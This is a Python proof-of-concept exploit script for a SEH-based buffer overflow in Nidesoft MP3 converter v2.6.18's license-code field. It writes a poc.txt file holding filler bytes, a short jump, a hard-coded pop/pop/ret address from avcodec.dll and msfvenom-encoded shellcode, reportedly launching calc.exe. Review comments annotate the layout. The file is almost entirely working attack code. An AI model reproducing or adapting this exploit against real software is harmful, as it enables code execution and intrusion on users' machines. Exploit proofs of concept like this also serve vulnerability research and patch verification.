#!python
#####################################################################################
# Exploit title: MP3 converter v 2.6.18 License code SEH exploit
# Date: 2016-12-15
# Vendor homepage: http://www.nidesoft.com/mp3-converter.html
# Download: http://www.nidesoft.com/downloads/mp3-converter.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Launch program and enter the license code in the "Register" window
# Copy&Paste the "license" from poc.txt
#####################################################################################

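def write_poc(fname, buffer):
    """Write ``buffer`` to the file ``fname`` in binary mode.

    Any existing file at ``fname`` is truncated and replaced.

    Args:
        fname: Path of the file to create.
        buffer: Byte string to write; the handle is opened with 'wb', so the
            data is written without newline translation.

    Returns:
        None.
    """
    # The context manager closes the handle even when write() raises, which the
    # original open()/write()/close() sequence did not guarantee.
    with open(fname, 'wb') as fhandle:
        fhandle.write(buffer)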
|
|
|
|
# Assemble the over-long "license code" string described in the header and
# write it to poc.txt.
# NOTE(review): the header only says the string goes into the "Register"
# window; presumably the field is copied into a fixed-size stack buffer with
# no length check, so bounding that input is the fix to confirm in a patched
# build - TODO confirm against the binary.
# NOTE(review): Python 2 idiom - the '\x..' literals are used as raw bytes and
# handed to a file handle opened in 'wb' mode.

# Output file; per the header, its contents are pasted in as the "license".
fname="poc.txt"
# 0x176c (5996) filler bytes of 'A' placed ahead of the 8 bytes built from
# jmp + nseh below. Presumably the distance to the exception record on the
# tested build (v2.6.18 on Win7 SP1) - not derivable from this listing.
buf = '\x41' * 0x176c

###################################
#msfvenom --payload windows/exec
#cmd=calc.exe --platform windows
#-f python -e x86/alpha_mixed
##################################
# NOTE(review): the generator comment above is the only statement of what
# these bytes do (run calc.exe). The encoded blob is opaque in this listing,
# so treat that description as unverified.
shellcode = ""
shellcode += "\x89\xe0\xda\xdc\xd9\x70\xf4\x59\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
shellcode += "\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x58\x68\x4d\x52"
shellcode += "\x37\x70\x63\x30\x33\x30\x75\x30\x4b\x39\x59\x75\x45"
shellcode += "\x61\x79\x50\x70\x64\x4c\x4b\x42\x70\x36\x50\x4c\x4b"
shellcode += "\x42\x72\x66\x6c\x6e\x6b\x66\x32\x66\x74\x6c\x4b\x74"
shellcode += "\x32\x37\x58\x34\x4f\x4d\x67\x61\x5a\x45\x76\x75\x61"
shellcode += "\x69\x6f\x4e\x4c\x77\x4c\x43\x51\x63\x4c\x54\x42\x66"
shellcode += "\x4c\x75\x70\x39\x51\x48\x4f\x46\x6d\x67\x71\x4b\x77"
shellcode += "\x7a\x42\x48\x72\x63\x62\x30\x57\x6e\x6b\x51\x42\x74"
shellcode += "\x50\x4c\x4b\x61\x5a\x77\x4c\x6c\x4b\x52\x6c\x57\x61"
shellcode += "\x62\x58\x7a\x43\x53\x78\x45\x51\x68\x51\x43\x61\x4c"
shellcode += "\x4b\x72\x79\x55\x70\x56\x61\x38\x53\x4e\x6b\x67\x39"
shellcode += "\x46\x78\x5a\x43\x65\x6a\x37\x39\x4c\x4b\x36\x54\x6e"
shellcode += "\x6b\x57\x71\x7a\x76\x44\x71\x49\x6f\x6e\x4c\x6f\x31"
shellcode += "\x58\x4f\x36\x6d\x56\x61\x48\x47\x66\x58\x39\x70\x73"
shellcode += "\x45\x69\x66\x66\x63\x53\x4d\x5a\x58\x47\x4b\x53\x4d"
shellcode += "\x65\x74\x34\x35\x6d\x34\x70\x58\x6c\x4b\x61\x48\x35"
shellcode += "\x74\x53\x31\x69\x43\x65\x36\x4e\x6b\x74\x4c\x30\x4b"
shellcode += "\x4c\x4b\x46\x38\x67\x6c\x35\x51\x48\x53\x6e\x6b\x35"
shellcode += "\x54\x6e\x6b\x65\x51\x7a\x70\x4f\x79\x37\x34\x45\x74"
shellcode += "\x75\x74\x43\x6b\x33\x6b\x33\x51\x73\x69\x51\x4a\x36"
shellcode += "\x31\x6b\x4f\x39\x70\x51\x4f\x43\x6f\x73\x6a\x6e\x6b"
shellcode += "\x54\x52\x6a\x4b\x4e\x6d\x53\x6d\x51\x7a\x77\x71\x4c"
shellcode += "\x4d\x6c\x45\x4e\x52\x53\x30\x47\x70\x75\x50\x52\x70"
shellcode += "\x45\x38\x54\x71\x4e\x6b\x70\x6f\x6e\x67\x39\x6f\x58"
shellcode += "\x55\x4d\x6b\x4a\x50\x78\x35\x4d\x72\x36\x36\x43\x58"
shellcode += "\x79\x36\x7a\x35\x6f\x4d\x4d\x4d\x4b\x4f\x79\x45\x37"
shellcode += "\x4c\x77\x76\x51\x6c\x75\x5a\x6b\x30\x79\x6b\x49\x70"
shellcode += "\x62\x55\x37\x75\x6d\x6b\x61\x57\x35\x43\x74\x32\x52"
shellcode += "\x4f\x30\x6a\x55\x50\x31\x43\x4b\x4f\x69\x45\x32\x43"
shellcode += "\x43\x51\x32\x4c\x50\x63\x34\x6e\x61\x75\x62\x58\x50"
shellcode += "\x65\x67\x70\x41\x41"

# 0x1e (30) more 'A' bytes placed between the jmp + nseh pair and the payload.
junk = '\x41' * 0x1e
# '\xeb\x20' is an x86 short JMP forward by 0x20 bytes; the two 'A' bytes pad
# the value to 4 bytes.
jmp = '\xeb\x20\x41\x41'
# NOTE(review): the names look swapped relative to the usual exception-record
# layout. In the final buffer `jmp` comes first and this value second, and the
# inline comment calls it a pop/pop/ret address, so this is presumably the
# handler pointer while `jmp` fills the next-record slot.
# The address is hard-coded, so the PoC depends on the exact avcodec.dll build
# it was taken from - presumably the one shipped with v2.6.18.
nseh = '\x37\x27\x78\x66' #pop pop ret -> avcodec.dll
# Final layout, in order: filler, jmp, nseh, junk, shellcode.
# NOTE(review): `buffer` shadows the Python 2 builtin of the same name.
buffer = buf + jmp + nseh + junk + shellcode
# Write the assembled string to poc.txt through the write_poc helper defined
# earlier in this file.
write_poc(fname, buffer)